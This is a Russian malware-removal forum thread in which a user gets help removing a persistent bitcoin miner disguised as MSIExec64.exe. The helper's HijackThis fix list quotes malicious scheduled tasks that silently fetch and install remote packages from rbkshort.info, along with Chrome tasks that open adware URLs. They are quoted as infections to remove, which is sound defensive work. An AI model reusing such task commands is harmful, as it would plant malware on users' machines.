MSIExec64.exe (tool.btcmine.1350)

[vnrich]

Приветствую.
AutoLogger прекращает работу после старта майнера, при запуске Windows 10 AVZ начинает работу (выходит окошко и т.д.) как только запускается майнер AVZ закрывается, в дальнейшем AVZ закрывается сразу (не выходит окошко...).
При наборе в гугле "AVZ скачать" Firefox закрывается, при наборе "A V Z скачать" работает. При попытке скачать "Хром" Firefox закрывается.
Майнер находится в C:\Users\имя\AppData\Local\Miniport WDM Driver, у меня установлено три системы Windows на разные диски, при запуске Windows 7 каталог Miniport WDM Driver можно удалить, при запуске Windows 10 папка Miniport WDM Driver и MSIExec64.exe возрождаются снова.
CureIt удалить майнер также не может, но когда находит -- вроде блокирует и до перезапуска Windows майнер не работает.
Что делать, как снять логи?

[Info_bot]

Уважаемый(ая) vnrich, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[vnrich]

Получилось создать лог. Перед включением компьютера выдернул шнур к сетевой карте. После загрузки Windows 10 подождал 5 минут и подсоединил шнур, AutoLogger отработал нормально.

- - - - -Добавлено - - - - -

Если перед включением компьютера выдернул шнур к сетевой карте, Curelt майнер не находит, если включить компьютер с подключенным интернетом, то Curelt находит майнер, но тогда не работает AutoLogger т.е. AVZ.

Вывелось сообщение без подключенного интернета:
Confirm
Cannot create file: "C:\Users\имя\AppData\Local\Miniport WDM Driver\MSIExec64.exe" - Native error: 00019. File processing error, possibly disk is full
Abort Retry Ignore
Хрен там full. Abort конечно.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1406938720-4028786731-2414206872-1001 - C:\Users\vnric\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: {0E7F046A-3D7A-6978-A64D-A5BADAF0A9AA} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://style-mod.net/cl/?guid=8cv4p9szy4v08fx9gptgaoelxu3tegrd&prid=1&pid=4_1025_0 (file missing)
O22 - Task: {7D55A8A3-040F-8959-7CDB-74CF9D10F1C3} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://style-mod.net/cl/?guid=wwl2bdour7r35pigckdoccozrgez01rn&prid=1&pid=4_1025_0 (file missing)
O22 - Task: {A6343400-14C0-4686-8522-888CF6842E51} - C:\WINDOWS\IOdVbrirea.exe /q /i http://rbkshort.info/ubrtzouwiopa.rdp
O22 - Task: {FF830435-3C0B-CD1E-FBF3-94C78F8DF11D} - C:\Users\vnric\AppData\Local\UXCxskE.exe /q /i http://rbkshort.info/fqe8t16i49id.pob

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[vnrich]

Благодарю за ответ.
С этим я уже разобрался, в планировщике заданий была задача которая и запускала майнер.